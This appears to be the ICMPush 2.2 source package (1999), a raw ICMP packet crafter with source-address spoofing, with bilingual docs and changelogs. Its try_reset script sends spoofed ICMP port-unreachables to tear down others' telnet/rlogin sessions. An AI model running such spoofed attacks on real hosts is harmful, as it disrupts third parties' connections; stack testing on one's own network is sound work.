icmpush-2.2.orig/0040755000175000017500000000000006664366514012130 5ustar domdomicmpush-2.2.orig/cuenta.c0100644000175000017500000000113306653454353013543 0ustar domdom/*****************************************/ /* Nasty program to generate numbers. :) */ /*****************************************/ #include #include void main(int argc, char *argv[]) { register int i; int final, princ; if (argc == 3) { princ = atoi(argv[1]); final = atoi(argv[2]); if ( princ <= final ) { for ( i = princ; i <= final; i++ ) printf("%d ", i); return; } } #ifdef SPANISH printf("Uso: %s num.inicio num.final\n", argv[0]); #else printf("Use: %s begin# end#\n", argv[0]); #endif } icmpush-2.2.orig/help.c0100644000175000017500000001077706662512200013214 0ustar domdom/**********************************************/ /* This is only the help part of the program. */ /* See the man page for further details. */ /**********************************************/ #include extern char *prog; void help(void) { #ifdef SPANISH fprintf(stdout," Uso: %s tipo [opciones] host\n",prog); fprintf(stdout,"Tipo:\n"); fprintf(stdout," -du Destination Unreach -echo Echo Request\n"); fprintf(stdout," -info Information Request -mask Address Mask Request\n"); fprintf(stdout," -rta Router Advertisement -rts Router Solicitation\n"); fprintf(stdout," -red Redirect -sq Source Quench\n"); fprintf(stdout," -tstamp Timestamp -tx Time Exceeded\n"); fprintf(stdout," -param Parameter Problem\n"); fprintf(stdout," -v Modo informativo -vv Modo debug\n"); fprintf(stdout," -h Pantalla de ayuda -V Versión del programa\n\n"); fprintf(stdout,"Opciones:\n"); fprintf(stdout," -sp address Host a usar como spoof.\n"); fprintf(stdout," -to secs Timeout en segundos para leer las respuestas.\n"); fprintf(stdout," -n No usar resolución DNS de hosts.\n"); fprintf(stdout," -lt secs Lifetime en segundos de Router Advertisement.\n"); fprintf(stdout," -gw address Host gateway de ruta en un ICMP Redirect.\n"); fprintf(stdout," -dest address Host 
destino de ruta en un ICMP Redirect.\n"); fprintf(stdout," -orig address Host original en un ICMP error.\n"); fprintf(stdout," -psrc port Puerto origen (tcp/udp) a usar en datos de ICMP error.\n"); fprintf(stdout," -pdst port Puerto destino (tcp/udp) a usar en datos de ICMP error.\n"); fprintf(stdout," -prot Protocolo a usar en datos de ICMP error (tcp|udp|icmp).\n"); fprintf(stdout," -id ident Identificador en ICMPs de información.\n"); fprintf(stdout," -seq seq# Número de secuencia en ICMPs de información.\n"); fprintf(stdout," -pat patron Patrón de datos a enviar en un ICMP Echo Request.\n"); fprintf(stdout," -gbg bytes|max Cantidad de bytes basura a enviar o máximo(max).\n"); fprintf(stdout," -ptr byte Puntero a byte erróneo en ICMP Parameter Problem.\n"); fprintf(stdout," -c cod|num|max Código de ICMP. Mirar página man para más detalles.\n\n"); #else fprintf(stdout," Usage: %s type [options] host\n",prog); fprintf(stdout,"Type:\n"); fprintf(stdout," -du Destination Unreach -echo Echo Request\n"); fprintf(stdout," -info Information Request -mask Address Mask Request\n"); fprintf(stdout," -rta Router Advertisement -rts Router Solicitation\n"); fprintf(stdout," -red Redirect -sq Source Quench\n"); fprintf(stdout," -tstamp Timestamp -tx Time Exceeded\n"); fprintf(stdout," -param Parameter Problem\n"); fprintf(stdout," -v Verbose mode on -vv Debug mode on\n"); fprintf(stdout," -h This help screen -V Program version\n\n"); fprintf(stdout,"Options:\n"); fprintf(stdout," -sp address Spoof host.\n"); fprintf(stdout," -to secs Timeout secs to read the replies.\n"); fprintf(stdout," -n Don't use name resolution.\n"); fprintf(stdout," -lt secs Lifetime secs for an ICMP Router Advertisement.\n"); fprintf(stdout," -gw address Route gateway host for an ICMP Redirect.\n"); fprintf(stdout," -dest address Route destination host for an ICMP Redirect.\n"); fprintf(stdout," -orig address Original host for an ICMP error.\n"); fprintf(stdout," -psrc port Source port (tcp/udp) of 
ICMP error data.\n"); fprintf(stdout," -pdst port Destination port (tcp/udp) of ICMP error data.\n"); fprintf(stdout," -prot ICMP error data protocol ( tcp | udp | icmp ).\n"); fprintf(stdout," -id ident Identification for an ICMP information message.\n"); fprintf(stdout," -seq seq# Sequence number for an ICMP information message.\n"); fprintf(stdout," -pat pattern Data pattern to send within an ICMP Echo Request.\n"); fprintf(stdout," -gbg bytes|max Number of garbage data bytes to send or maximum(max).\n"); fprintf(stdout," -ptr byte Incorrect byte on an ICMP Parameter Problem.\n"); fprintf(stdout," -c code|num|max ICMP code. See the man page for details.\n\n"); #endif exit(0); } icmpush-2.2.orig/mtu.c0100644000175000017500000001535606662420116013073 0ustar domdom/***********************************************************/ /* Functions to determine the MTU value from a network */ /* interface and the IP address from an outgoing interface */ /***********************************************************/ /* To solve: */ /* - Under Solaris 2.5.1 it's not possible to get the */ /* outgoing interface without reading the routing table, */ /* get the interface name and get the netmask from */ /* /etc/netmasks. This implies (among other things) the */ /* use of STREAMS with the /dev/ip device ... */ /* Maybe some day ;) */ /***********************************************************/ #include #include #include #include #ifdef SOLARIS #include #endif #include #include #include #include #include #include #include "mtu.h" #include "misc.h" #ifdef SOLARIS extern char *sys_errlist[]; #endif extern u_short more_verbose; /****************************/ /* Functions prototypes ... 
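*/
/****************************/
int get_mtu( struct sockaddr_in * );
int get_iface_out( struct sockaddr_in *, struct sockaddr_in * );
int get_iface_mtu( struct sockaddr * );
int coloca_interfaz( int, char *, struct mi_ifaz * );
int equal( struct sockaddr_in *, struct sockaddr_in * );
extern char *pasa( struct sockaddr_in * );
/*******************************/
/* ...end functions prototypes */
/*******************************/

/****************************************************/
/* Returns the MTU of the local interface whose     */
/* address get_iface_out() reports for "ip2see".    */
/* Returns MTU_DFL when get_iface_out() fails.      */
/****************************************************/
int get_mtu( struct sockaddr_in *ip2see )
{
    struct sockaddr ip_aux;   /* filled in by get_iface_out() on success */

    if ( get_iface_out( ip2see, (struct sockaddr_in *)&ip_aux ) )
        return MTU_DFL;

    return ( get_iface_mtu( &ip_aux ) );
}

/**********************************/
/* Try to get the IP address from */
/* the outgoing interface "ala"   */
/* Stevens way. ;)                */
/**********************************/
/* Arguments :                    */
/*  - ip2see : Destination to     */
/*             connect() to.      */
/*  - aux    : Receives the local */
/*             address reported   */
/*             by getsockname().  */
/**********************************/
/* Return : 0 on success, 1 on    */
/* error or when the local        */
/* address comes back as 0.       */
/**********************************/
int get_iface_out( struct sockaddr_in *ip2see, struct sockaddr_in *aux )
{
    /* NOTE(review): current POSIX systems declare the getsockname()
       length argument as socklen_t *; "int" is kept as the file had it. */
    int sock_rt, len, on = 1;
    struct sockaddr_in iface_out;

    iniciamem( (char *)&iface_out, sizeof(struct sockaddr_in) );

    /* The descriptor used to be passed to setsockopt() unchecked. */
    sock_rt = socket( AF_INET, SOCK_DGRAM, 0 );
    if ( sock_rt < 0 )
    {
        if ( more_verbose )
            fprintf(stderr, "socket -> %s\n", sys_errlist[errno] );
        return 1;
    }

    /* Every error path below closes sock_rt; the message is printed
       first so that close() cannot disturb errno before it is read. */
    if ( setsockopt( sock_rt, SOL_SOCKET, SO_BROADCAST, (char *)&on,
                     sizeof(on) ) == -1 )
    {
        if ( more_verbose )
            fprintf(stderr, "setsockopt -> %s\n", sys_errlist[errno] );
        close(sock_rt);
        return 1;
    }

    if ( connect( sock_rt, (struct sockaddr *)ip2see,
                  sizeof(struct sockaddr_in) ) == -1 )
    {
        if ( more_verbose )
            fprintf( stderr,"connect -> %s\n", sys_errlist[errno] );
        close(sock_rt);
        return 1;
    }

    len = sizeof(iface_out);
    if ( getsockname( sock_rt, (struct sockaddr *)&iface_out, &len ) == -1 )
    {
        if ( more_verbose )
            fprintf(stderr,"getsockname -> %s\n", sys_errlist[errno] );
        close(sock_rt);
        return 1;
    }

    close(sock_rt);

    if ( more_verbose )
#ifdef SPANISH
        fprintf(stdout," -> Interfaz de salida = %s\n", pasa((struct sockaddr_in *)&iface_out));
#else
        fprintf(stdout," -> Outgoing interface = %s\n", pasa((struct sockaddr_in *)&iface_out));
#endif

    /* An all-zero local address is treated as "no outgoing interface". */
    if ( !iface_out.sin_addr.s_addr )
        return 1;

    copymem( (char *)&iface_out, (char *)aux, sizeof(struct sockaddr_in) );
    return 0;
}

/***********************************************/
/* Returns the 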
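MTU from a networking interface */
/* searching for the appropriate interface     */
/* on the interfaces kernel list.              */
/* On error returns the default MTU (See       */
/* mtu.h)                                      */
/***********************************************/
int get_iface_mtu( struct sockaddr *ip2see )
{
    struct ifconf ifc;
    struct ifreq *ifaz;
    struct mi_ifaz mi_interfaz;
    /* NOTE(review): fixed 1024-byte buffer for SIOCGIFCONF; presumably a
       host with more entries than fit here gets a truncated list - confirm. */
    char buffer[1024];
    int i, n_ifaz, sock_disp;

    if ( (sock_disp = socket(AF_INET, SOCK_DGRAM, 0)) < 0 )
    {
        if ( more_verbose )
            fprintf(stderr, "When trying socket() to kernel -> %s", sys_errlist[errno]);
        return MTU_DFL;
    }

    ifc.ifc_len = sizeof(buffer);
    ifc.ifc_buf = buffer;
    if ( ioctl( sock_disp, SIOCGIFCONF, &ifc ) < 0 )
    {
        if ( more_verbose )
            fprintf(stderr, "SIOCGIFCONF -> %s", sys_errlist[errno]);
        /* This path used to return with the descriptor still open. */
        close(sock_disp);
        return MTU_DFL;
    }

    /* Walk the entries the kernel returned, looking for an interface
       that is up and carries the address we were asked about. */
    n_ifaz = ifc.ifc_len / sizeof(struct ifreq);
    ifaz = ifc.ifc_req;
    for ( i = 0; i < n_ifaz; i++, ifaz++ )
    {
        iniciamem( (char *)&mi_interfaz, sizeof(struct mi_ifaz) );

        /* An interface whose values cannot be read is skipped. */
        if ( coloca_interfaz( sock_disp, ifaz->ifr_name, &mi_interfaz ) )
            continue;

        if ( ( mi_interfaz.ifaz_flags & IFF_UP ) &&
             ( equal( (struct sockaddr_in *)&mi_interfaz.ifaz_ip,
                      (struct sockaddr_in *)ip2see ) ) )
        {
            close(sock_disp);
            return mi_interfaz.ifaz_mtu;
        }
    }

    close(sock_disp);
    return MTU_DFL;
}

/*******************************************/
/* Copy the values from the interface      */
/* "nombre" to "mi_interfaz" struct        */
/*******************************************/
/* Arguments :                             */
/*  - sock_disp   : Socket descriptor used */
/*                  for the interface      */
/*                  ioctl()s (the caller   */
/*                  in this file passes a  */
/*                  SOCK_DGRAM socket).    */
/*  - nombre      : Interface name.        */
/*  - mi_interfaz : Struct where to put    */
/*                  the interface values.  */
/*******************************************/
/* Return : 1 on error, or 0 else other. 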
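*/
/*******************************************/
int coloca_interfaz( int sock_disp, char *nombre, struct mi_ifaz *mi_interfaz )
{
    struct ifreq if_aux; /* "Auxiliary" structure :) */

    /* The request name field has a fixed size, so the copy is bounded and
       always terminated instead of trusting the length of "nombre". */
    memset( &if_aux, 0, sizeof(if_aux) );
    strncpy( if_aux.ifr_name, nombre, sizeof(if_aux.ifr_name) - 1 );
    if_aux.ifr_name[sizeof(if_aux.ifr_name) - 1] = '\0';

    /* Copy from the bounded name, so at most sizeof(ifr_name) bytes are
       written. NOTE(review): the size of ifaz_nombre is declared in mtu.h,
       which is not visible here - confirm it holds an interface name. */
    strcpy( mi_interfaz->ifaz_nombre, if_aux.ifr_name );

    if ( ioctl( sock_disp, SIOCGIFADDR, &if_aux ) < 0 )
    {
        if ( more_verbose )
            fprintf(stderr,"SIOCGIFADDR -> %s\n", sys_errlist[errno]);
        return 1;
    }
    mi_interfaz->ifaz_ip = if_aux.ifr_addr;

    /* The name is re-set before each request, as the original code did. */
    strncpy( if_aux.ifr_name, nombre, sizeof(if_aux.ifr_name) - 1 );
    if_aux.ifr_name[sizeof(if_aux.ifr_name) - 1] = '\0';
    if ( ioctl( sock_disp, SIOCGIFMTU, &if_aux ) < 0 )
    {
        if ( more_verbose )
            fprintf(stderr,"SIOCGIFMTU -> %s\n", sys_errlist[errno]);
        return 1;
    }
#ifdef LINUX
    mi_interfaz->ifaz_mtu = if_aux.ifr_mtu;
#else
    mi_interfaz->ifaz_mtu = if_aux.ifr_metric;
#endif

    strncpy( if_aux.ifr_name, nombre, sizeof(if_aux.ifr_name) - 1 );
    if_aux.ifr_name[sizeof(if_aux.ifr_name) - 1] = '\0';
    if ( ioctl( sock_disp, SIOCGIFFLAGS, &if_aux ) < 0 )
    {
        if ( more_verbose )
            fprintf(stderr,"SIOCGIFFLAGS -> %s\n", sys_errlist[errno]);
        return 1;
    }
    mi_interfaz->ifaz_flags = if_aux.ifr_flags;

    return 0;
}

/*****************************/
/* Compares 2 sockaddr_in    */
/*****************************/
/* Returns 1 if eq           */
/* Returns 0 else other      */
/* Don't care about the port */
/*****************************/
int equal( struct sockaddr_in *if_ip, struct sockaddr_in *ip2see )
{
    /* Only the address family and the IPv4 address are compared. */
    return ( if_ip->sin_family == ip2see->sin_family ) &&
           ( if_ip->sin_addr.s_addr == ip2see->sin_addr.s_addr );
}
icmpush-2.2.orig/INSTALL0100644000175000017500000000130606662156150013145 0ustar domdomINSTALL for ICMPush v2.2 ======================== Before all, login as root and ... 1.- Compilation: Take a look into the Makefile and after: make linuz or make solaris If you get the message "undefined reference to __inet_aton" you have the library that comes with bind 8.1.2. To link correctly you must put the complete path to the library in the LIBBINDDIR Makefile variable. 2.- Installation: By default the program installs itself into /usr/local/bin, you can change it with the Makefile variable INST_DIR. 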
The man page installs into /usr/local/man/man8, you can change it with the Makefile variable MAN_DIR. make install Byez. icmpush-2.2.orig/LEEME0100644000175000017500000001133506660336007012670 0ustar domdomLEEME para ICMPush v2.2 ======================= "Este programa se distribuye bajo licencia GNU GPL, consultar el fichero COPYING para más detalles" Hace unos 4 o 5 años decidí hacer un programa que generara ICMP redirects para probar la estabilidad de las tablas de rutas de mis HP-UX de la época (HP-UX 9.0 :D) de ahí nació el redirect.c un cutre-programa (como todos los mios) que enviaba ICMP redirects. Obviamente este programa se hizo solo para Linuz (ruuuuuulezzzzzz!!) pasando posteriormente a soportar también envío de ICMPs Source Quench, Time Exceeded y Destination Unreach. Bueno, al grano, estos últimos años solo fui modificando pijadillas del programa, añadiendo nuevos códigos de Unreach y cosas así, pero en esta nueva versión se permite el envío de paquetes ICMP de petición de información: Address Mask Request, Info Request, Timestamp Request, Router Solicitation (Router Discovery), Router Advertisement(Router Discovery) y Echo Request e indicar el timeout en segundos para la lectura de las respuestas. Tal vez pueda parecer farragoso tantos argumentos, pero para que una implementación TCP/IP se trague un ICMP en condiciones este debe cumplir ciertas características que intento sean suministradas desde línea de comandos. Mención aparte merecen los resultados de los redirects contra los F20 de HP rulando HP-UX 9.0 por que el problema no era que se los tragara y modificara dinámicamente la tabla de rutas sino que le daba igual que gateway pusieras en la ruta (que perteneciera a su subred o no) con lo cual podrías crear auténticos ataques catastróficos. Pero bueno, aquí está el programa y cada uno sabrá si le interesa o no. 
Aquí os indico las abreviaturas que se usan en el programa para identificar en la linea de comandos a los tipos de ICMP que acepta el programa: Valor Valor extend. Significado ------ ------------- ----------- -echo --echo_req Echo Request. -du --dest_unreach Destination Unreach. -info --info_req Information Request. -red --redirect Redirect. -mask --mask_req Address Mask Request. -param --param-problem Parameter Problem. -rts --router_solicit Router Solicitation (Router Discovery). -rta --router_advert Router Advertisement (Router Discovery). -sq --src_quench Source Quench. -tstamp --timestamp Timestamp. -tx --time_exc Time Exceeded. Mira la página man para ejemplos en detalle. A continuación os indico los valores de retorno que devuelve el programa ICMPush y el significado de los mismos para que podáis utilizarlo en cualquier shell-script: Valor Significado ----- ----------- 0 Programa finalizado OK 1 Numero de argumentos incorrecto 2 Protocolo ICMP desconocido 3 No puedo crear socket tipo RAW 4 Tipo de paquete ICMP incorrecto 5 Gateway incorrecto 6 Destino de ruta incorrecto 7 Código de paquete ICMP incorrecto 8 Host original incorrecto 9 Error enviando paquete 10 Protocolo todavía no implementado 11 Dirección IP o host de spoof incorrecto 12 No pude reservar memoria para unión data_hdr 13 Dirección IP o host destino incorrecto 14 Protocolo desconocido 16 Error leyendo socket RAW 17 Error al iniciar manejador de señal SIGALRM 18 Los datos que se quieren enviar en el paquete Echo Request son demasiado grandes 19 Puerto origen incorrecto 20 Puerto destino incorrecto 21 Valor de timeout incorrecto 22 Echo ID incorrecto 23 Numero de secuencia incorrecto 24 Datos de Echo incorrectos 25 Error en IP_HDRINCL 26 Dirección de router en paquete Router Advertisement incorrecta 27 Numero de bytes basura incorrecto 28 Puntero de ICMP Parameter Problem es incorrecto. 
También os dejo un mini-cutre-script llamado try_reset para intentar tirar conexiones telnet y rlogin, también podéis ver el uso de los valores de retorno del programa ICMPush para que os hagáis una idea, pero os aviso que es una gilipollez. Ya esta probado el uso del Router Solicitation (Router Discovery) gentileza de Infovía Plus ;) y rula OK. --------------------------------------------------------------------------- IMPORTANTE: Este programa está concebido para testear la red o hosts de uno mismo a fin de mejorar la seguridad; de hecho yo lo hago a menudo con mi red, pero *NO* está hecho para un uso ilegal o peligroso del mismo. Esto puede constituir un delito en ciertos países del que, por supuesto, no me hago responsable. --------------------------------------------------------------------------- Por lo demás, me gusta que la gente me escriba dando sus opiniones sobre el programa (tanto buenas como malas) o sobre la vida misma. ;-) Mi dirección es: tcpbgp@softhome.net ¡Que lo disfrutéis! Madrid, 1999. Slayer. icmpush-2.2.orig/INSTALAR0100644000175000017500000000211406664366513013262 0ustar domdomINSTALAR para ICMPush v2.2 ========================== Lo primero es entrar como root y después ... 1.- Compilación: Échale un vistazo al fichero Makefile, si quieres que los mensajes del programa vengan en español descomenta la variable LNG. Después puedes ejecutar: make linuz o make solaris Si te da problemas de "undefined reference to __inet_aton" es que tienes los includes de la libreria del bind 8.1.2. Para que te enlace correctamente deberás indicar el camino completo hacia ella en la variable LIBBINDDIR del fichero Makefile. 2.- Instalación: Por defecto se instala en /usr/local/bin, si lo quieres cambiar hazlo en el fichero Makefile cambiando la variable INST_DIR. 
La página man que se instala por defecto es la inglesa y lo hace en /usr/local/man/man8, si quieres usar la página man española se encuentra en el fichero icmpush.es.8, si lo que quieres es cambiar el directorio de instalación por defecto cambia la variable MAN_DIR en el el fichero Makefile. Después ejecuta: make install Saludos. icmpush-2.2.orig/README0100644000175000017500000000732406662156370013006 0ustar domdomREADME for ICMPush v2.2 ======================= "This program is distributed under the GNU GPL license. See the COPYING file for more details." Ok, there's the ICMPush program, the first version was produced 4 (more or less) years ago and was called originally redirect.c (not the redirect.c sent long time ago to rootshell) and only supported ICMP redirect type. Now, the ICMP error types: Unreach, Parameter Problem, Redirect and Source Quench are allowed, and the ICMP information types: Timestamp, Address Mask Request, Information Request, Router Solicitation (Router Discovery), Router Advertisement (Router Discovery) and Echo Request are also allowed and can wait a timeout to print the replies received. Each one knows if it interest for you or not. :) Below there are the keys for the ICMP packet types accepted on the command line: Value Extended Value Meaning ----- -------------- ------- -echo --echo_req Echo Request. -du --dest_unreach Destination Unreach. -info --info_req Information Request. -red --redirect Redirect. -mask --mask_req Address Mask Request. -param --param_problem Parameter Problem. -rts --router_solicit Router Solicitation (Router Discovery). -rta --router_advert Router Advertisement (Router Discovery). -sq --src_quench Source Quench. -tstamp --timestamp Timestamp. -tx --time_exc Time Exceeded. This keys can be combined with multiple options like ICMP code (-c code), timeout (-to seconds), no resolve (-n), garbage bytes (-gbg bytes|max), etc. See the man page for examples with great detail. 
Below are the values that the ICMPush program returns to the system, and their meaning. You can use them within a shell script:

Value  Meaning
-----  -------
  0    Program finished OK
  1    Wrong number of arguments
  2    Unknown ICMP protocol
  3    Can't build RAW sockets
  4    Incorrect ICMP packet type
  5    Wrong gateway
  6    Incorrect route destination
  7    Incorrect ICMP packet code
  8    Wrong original host
  9    Error while sending packet
 10    Protocol still not implemented
 11    Wrong spoof IP or hostname
 12    Can't allocate union data_hdr memory
 13    Wrong destination IP or hostname
 14    Unknown protocol
 16    Error while reading RAW socket
 17    Error while initializing SIGALRM signal handler
 18    The Echo Request data pattern length is too big
 19    Incorrect source port value
 20    Incorrect destination port value
 21    Incorrect timeout value
 22    Incorrect Echo ID value
 23    Incorrect sequence number
 24    Incorrect Echo data value
 25    IP_HDRINCL error
 26    Incorrect router address of an ICMP Advertisement packet
 27    Incorrect or missing garbage data bytes
 28    Incorrect pointer of ICMP Parameter Problem

I also attach a nasty mini-script called try_reset that tries to reset existing telnet or rlogin connections; in it you can see how the values returned from the ICMPush program are used within a shell script. But I warn you: it's a bad script. :)

Support for Router Solicitation (Router Discovery) is finished and it seems to work OK. Tnx to Infovia Plus. ;)

-----------------------------------------------------------------------
IMPORTANT: I released this program for evaluation of TCP/IP stacks *ONLY*. Treat it as a little tool to improve your system security, not for cracking, disturbing or flooding other systems. That can be a crime in certain countries.
-----------------------------------------------------------------------

I like to read your opinions, suggestions, bug reports etc. about this program. My e-mail address is: tcpbgp@softhome.net Feel free to contact me. :)

Enjoy!

Ooooooops! The last thing ... sorry for my bad English!
:) Madrid, 1999. Slayer. icmpush-2.2.orig/try_reset0100700000175000017500000000342406662156105014053 0ustar domdom#!/bin/sh # # Nasty script to send ICMP packets that verifies the returned # values from the ICMPush program :) # In this case to reset an existing rlogin or telnet connection. # # Example: # # ./try_reset LDG01 10.76.37.37 1200 2500 # # This example send ICMP Unreach packets with source of LDG01 to 10.76.37.37 # saying that the ports from 1200 to 2500 of LDG01 are unreachables. # This could make that the host 10.76.37.37 reset the connection of his # telnet port(23) or rlogin port(513) with the host LDG01 range port 1200-2500 # Of course, the reset of an existing TCP connection caused by an ICMP # Unreach depends on the implementation of the TCP/IP stack of the host that # receives the ICMP. # # if [ "$#" = 4 ]; then for i in `cuenta $3 $4` do icmpush -du -sp $1 -c port-unreach -prot tcp -psrc 23 -pdst $i $2 1> /dev/null 2>&1 case $? in 0) echo "ICMP packet sent to host $2" ;; 2) echo "ICMP protocol not exists in /etc/protocols" ; exit ;; 11) echo "Spoof host $1 incorrect (name or IP address)" ; exit ;; 13) echo "Destination host $2 incorrect (name or IP address)" ; exit ;; *) echo "Error while trying to send an ICMP packet to host $2" ;; esac icmp -du -sp $1 -c port-unreach -prot tcp -psrc 513 -pdst $i $2 1> /dev/null 2>&1 case $? in 0) echo "ICMP packet sent to host $2" ;; 2) echo "ICMP protocol not exists in /etc/protocols" ; exit ;; 11) echo "Spoof host $1 incorrect (name or IP address)" ; exit ;; 13) echo "Destination host $2 incorrect (name or IP address)" ; exit ;; *) echo "Error while trying to send an ICMP packet to host $2" ;; esac done else echo "Use: $0 source_host destination_host begin_port end_port" exit; fi icmpush-2.2.orig/CHANGES0100644000175000017500000000425406664230575013122 0ustar domdomCHANGES for ICMPush v2.2 ======================== v2.2: - Changed the name from ICMP to ICMPush. 
- Size of pattern data grow up to 64k (or more on Linuz). Fragmentation made by the program itself on Linuz. - IP_HDRINCL supported. Use only a socket. - Random sequence number of Information packets. - Support for Router Advertisement to test routers. Can send multiple routers addresses with their own preference on 1 Advertisement packet. - Cleaned up the code. A parser function with multiple options and a more friendly user interface. - Resolving hosts to names is now optional (-n). - Changed the compile option -DEBUG to a runtime option (-vv). - Support for bytes of data garbage to test icmp/ip implementations. Option = '-gbg bytes|max'. - Support for another ICMP error type: Parameter Problem. - Max code support for the ICMP types that have codes (Redirect, Unreach and Time Exceeded). This sends an ICMP code greater than the standard codes. Option= '-c max'. - Numeric codes support for the ICMP types that *DOESN'T* support codes (Echo Request, Source Quench, Timestamp Request, Parameter problem, Router Advertisement, Router Solicitation, Info Request and Address Mask Request). This sends an ICMP packet with the code equal to the number parsed from the command line. Option = '-c number'. - Finally we have a man page. Thx to wait_man (wait_man@apostols.org) and for the english translation to binaria (binaria@totalcoredump.org) kisses! :DD. v2.11: - GNU GPL license distribution. - The Router Discovery support has been tested and works ok. - Support for data pattern into an ECHO REQUEST type. Idea by Sean (fa-q@infomind.net). Option = '-pat pattern'. v2.1: - Added support for transmit/receive ICMP Echo Request/Echo Reply. - Cleared the broadcast setsockopt error. v2.06: - Added support for ICMP Address Mask Request, Information Request, Timestamp and Router Solicitation (Router Discovery). Can read the replies via RAW socket. Can put a timeout replies on command line. (default is 5 secs). 
- Added support on compat.h for BIG ENDIAN systems in the IP header and support for Router Discovery structures. - Various minor changes. Slayer, Madrid, 1999. icmpush-2.2.orig/CAMBIOS0100644000175000017500000000501206664230617013115 0ustar domdomCAMBIOS para ICMPush v2.2 ========================= v2.2: - Se cambia el nombre del programa de ICMP a ICMPush. - Código revisado y modificado: Se ha incluido una función parser decente y se ha variado totalmente el interfaz con el usuario para que sea más amigable. - La resolución de nombres es ahora opcional (-n). - La opción de compilación -DEBUG es ahora una opción en tiempo de ejecución (-vv). - Se añade número de secuencia aleatorio en paquetes de información. - Soporte de IP_HDRINCL. Sólo se usa un socket. - El tamaño del patrón de datos puede llegar a 64k (o más en Linux). Fragmentación realizada por el propio programa en Linux. - Soporte de envío de Router Advertisements para testeo de routers con opción de envío de varios routers con su preferencia en el mismo paquete. - Soporte de una opción nueva de envío de bytes basura unidos al paquete icmp para testeo de implementaciones icmp/ip. Opción = '-gbg bytes|max'. - Soporte de otro tipo de error ICMP: Parameter Problem. - Soporte para envío de código ICMP máximo para los tipos de ICMP que soportan códigos (Redirect, Unreach y Time Exceeded). Esto envía un código mayor que los códigos normalizados. Opción = '-c max'. - Soporte de código numérico para aquellos tipos de ICMP que no soportan códigos (Echo Request, Information Request, Address Mask Request, Router Solicitation, Router Advertisement, Source Quench, Parameter Problem y Timestamp). Esto envía un código igual al numero introducido en linea de comandos. Opción = '-c numero'. - Por fin hay una página man gentileza de wait_man (wait_man@apostols.org) con traducción al inglés de binaria (binaria@totalcoredump.org) besos :). v2.11: - Distribución bajo licencia GNU GPL. 
- El soporte de Router Discovery ya está probado y funcionando. - Soporte de patrón de datos en paquetes ECHO REQUEST. Idea de Sean (fa-q@infomind.net). Opción = '-pat patron'. v2.1: - Soporte para envío/recepción de Echo Request y Echo Reply. - Arreglado el error del soporte de Broadcast, me equivoqué y lo aplicaba al socket de lectura en vez de al de escritura! :DDDDDD v2.06: - Se ha añadido soporte para los tipos Address Mask Request, Information Request, Timestamp y Router Solicitation (Router Discovery). Se leen las respuestas vía RAW socket y se puede especificar el timeout para recibirlas en línea de comandos (por defecto son 5 segundos). - Se ha añadido soporte en compat.h para sistemas BIG ENDIAN en la cabecera IP y estructuras para Router Discovery. - Varios cambios menores. Slayer, Madrid, 1999. icmpush-2.2.orig/COPYING0100644000175000017500000004307606633534453013165 0ustar domdom GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc. 675 Mass Ave, Cambridge, MA 02139, USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Library General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. 
Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. 
This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. 
b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program 